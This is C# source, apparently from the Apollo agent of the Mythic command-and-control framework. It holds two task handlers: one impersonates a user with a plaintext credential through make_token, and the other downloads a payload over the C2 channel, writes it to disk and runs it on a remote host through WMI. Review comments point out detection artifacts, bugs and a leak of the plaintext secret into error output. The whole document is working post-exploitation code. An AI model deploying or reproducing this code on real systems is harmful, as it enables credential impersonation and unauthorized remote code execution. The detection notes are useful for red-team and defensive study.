        /// <summary>
        /// Handles the make_token task: validates the credential carried in the task parameters and
        /// hands it to <see cref="CredentialManager.SetCredential"/>. The outcome is reported back through
        /// <c>j.SetError</c> / <c>j.SetComplete</c>; nothing is returned.
        /// </summary>
        /// <param name="j">Job whose <c>Task.parameters</c> is a JSON-encoded <see cref="MakeTokenParameter"/>
        /// holding a <see cref="MythicCredential"/> (account, credential, realm, credential_type).</param>
        public static void MakeToken(Job j)
        {
            var task = j.Task;
            // Task arguments arrive as a JSON string; a malformed document is not caught here and
            // would propagate out of this method as an exception.
            MakeTokenParameter parameters = JsonConvert.DeserializeObject <MakeTokenParameter>(task.parameters);

            MythicCredential cred = parameters.credential;


            // Both the account and the secret are mandatory.
            if (string.IsNullOrEmpty(cred.account) || string.IsNullOrEmpty(cred.credential))
            {
                j.SetError("Username and password are required for make_token.");
                return;
            }

            // Only a plaintext secret is accepted; any other credential_type is rejected up front.
            if (cred.credential_type != "plaintext")
            {
                j.SetError($"make_token can only be used with plaintext credentials, and was given credentials of type {cred.credential_type}");
                return;
            }


            // userFQDN is "realm\account", or ".\account" when no realm was supplied. It is only used in
            // the failure message below; SetCredential receives account, credential and realm separately.
            string userFQDN = cred.account;

            if (!string.IsNullOrEmpty(cred.realm))
            {
                userFQDN = cred.realm + "\\" + userFQDN;
            }
            else
            {
                userFQDN = ".\\" + userFQDN;
            }

            // What SetCredential does internally is not visible here (presumably it performs the logon the
            // artifact below describes). GetLastWin32Error is read right after it so the reported code is
            // not clobbered by an intervening Win32 call — keep nothing between the two.
            if (!CredentialManager.SetCredential(cred.account, cred.credential, cred.realm))
            {
                // NOTE(review): the plaintext secret is interpolated into the error text, so it ends up in
                // the task output and any log that stores job results; reporting userFQDN alone is enough.
                j.SetError($"Failed to make_token with {userFQDN}:{cred.credential}\n\t:Error Code: {Marshal.GetLastWin32Error()}");
                return;
            }

            try
            {
                // GetCurrentUsername is queried twice (message and artifact); both calls are assumed to
                // observe the same identity.
                string             msg  = $"Successfully impersonated {CredentialManager.GetCurrentUsername()}";
                ApolloTaskResponse resp = new ApolloTaskResponse(task, msg)
                {
                    // The artifact records what this action leaves in host telemetry: a Type 9
                    // (NewCredentials) logon, which Windows writes as Security event 4624 with
                    // LogonType 9 — the primary signal defenders use to spot this technique.
                    artifacts = new Artifact[]
                    {
                        new Artifact("Logon Event", $"New Type 9 Logon for {CredentialManager.GetCurrentUsername()}")
                    }
                };
                j.SetComplete(resp);
            }
            catch (Exception ex)
            {
                // Broad catch: any failure while building or sending the response is surfaced as a
                // task error together with the stack trace.
                j.SetError($"Unknown error: {ex.Message}\nStackTrace{ex.StackTrace}");
            }
        }
        /// <summary>
        /// Handles the WMI process-execute task: fetches a template executable through the agent's
        /// profile, writes it to disk under a GUID-based name, and then asks
        /// <see cref="WMIUtils.RemoteWMIExecute"/> to run it on <c>parameters.computer</c>, optionally
        /// with an explicit credential. Results are reported through <c>job.SetError</c>,
        /// <c>job.AddOutput</c> and <c>job.SetComplete</c>; nothing is returned.
        /// </summary>
        /// <param name="job">Job whose <c>Task.parameters</c> is a JSON-encoded
        /// <see cref="WMIProcessExecuteParameters"/> (computer, template, remote_path, credential).</param>
        /// <param name="agent">Agent whose <c>Profile</c> is used to download the template file.</param>
        public static void Execute(Job job, Agent agent)
        {
            // The explicit cast is redundant: the generic DeserializeObject already returns the target type.
            WMIProcessExecuteParameters parameters = (WMIProcessExecuteParameters)JsonConvert.DeserializeObject <WMIProcessExecuteParameters>(job.Task.parameters);
            ApolloTaskResponse          resp;
            // Default (empty) credential; replaced below only when parameters.credential is present.
            MythicCredential            cred = new MythicCredential();
            // Assigned from RemoteWMIExecute at the end but never read.
            bool success;

            byte[] templateFile;
            // Both stay null unless a credential with an account is supplied.
            string username            = null;
            string password            = null;
            // Assigned in the default-path branch below but never read (its use is commented out).
            string formattedRemotePath = null;
            // Random file name used for the staged executable.
            string fileGuid            = Guid.NewGuid().ToString();

            if (string.IsNullOrEmpty(parameters.computer))
            {
                job.SetError("No computer name passed.");
                return;
            }

            if (string.IsNullOrEmpty(parameters.template))
            {
                job.SetError("No template was given to download.");
                return;
            }
            // The credential is itself a JSON document nested inside the task parameters.
            if (!string.IsNullOrEmpty(parameters.credential))
            {
                cred = JsonConvert.DeserializeObject <MythicCredential>(parameters.credential);
            }
            // This initial value is overwritten in both branches below.
            string remotePath = parameters.remote_path;

            if (string.IsNullOrEmpty(parameters.remote_path))
            {
                // Default location: C:\Users\Public\<guid>.exe. formattedRemotePath is the UNC form of
                // the same path; it is computed but not used by the write further down.
                formattedRemotePath = $"\\\\{parameters.computer}\\C$\\Users\\Public\\{fileGuid}.exe";
                remotePath          = $"C:\\Users\\Public\\{fileGuid}.exe";
            }
            else
            {
                // Directory.Exists is evaluated by the process running this code, not on
                // parameters.computer; if it is a directory here, the GUID-named .exe is appended.
                if (Directory.Exists(parameters.remote_path))
                {
                    parameters.remote_path = Path.Combine(parameters.remote_path, $"{fileGuid}.exe");
                }
                remotePath = parameters.remote_path;
                //formattedRemotePath = $"\\\\{parameters.computer}\\{parameters.remote_path.Replace(':', '$')}";
            }

            try
            {
                // Download the template through the C2 profile; how GetFile chunks the transfer is not
                // visible here (presumably ChunkSize-sized pieces keyed by the task id).
                templateFile = agent.Profile.GetFile(job.Task.id, parameters.template, agent.Profile.ChunkSize);
            }
            catch (Exception ex)
            {
                job.SetError($"Error fetching remote file: {ex.Message}");
                return;
            }

            if (templateFile == null || templateFile.Length == 0)
            {
                job.SetError($"File ID {parameters.template} was of zero length.");
                return;
            }

            try
            {
                // The write targets remotePath (no host component in the default branch), not
                // formattedRemotePath. The GUID-named executable written here is the on-disk artifact
                // this task leaves behind and the first thing a responder should look for.
                File.WriteAllBytes(remotePath, templateFile);
                resp = new ApolloTaskResponse(job.Task, $"Copied payload to {remotePath}");
                job.AddOutput(resp);
            }
            catch (Exception ex)
            {
                job.SetError($"Remote file copy to {remotePath} failed. Reason: {ex.Message}");
                return;
            }


            // Build "realm\account" when a realm is present; the secret is passed on as plaintext.
            if (!string.IsNullOrEmpty(cred.account))
            {
                username = cred.account;
                if (!string.IsNullOrEmpty(cred.realm))
                {
                    username = cred.realm + "\\" + username;
                }
                password = cred.credential;
            }

            // NOTE(review): success is discarded and SetComplete is called unconditionally; if
            // RemoteWMIExecute leaves results null on failure, string.Join throws ArgumentNullException
            // here instead of the job reporting an error.
            success = WMIUtils.RemoteWMIExecute(parameters.computer, remotePath, out string[] results, username, password);
            job.SetComplete(string.Join("\n", results));
        }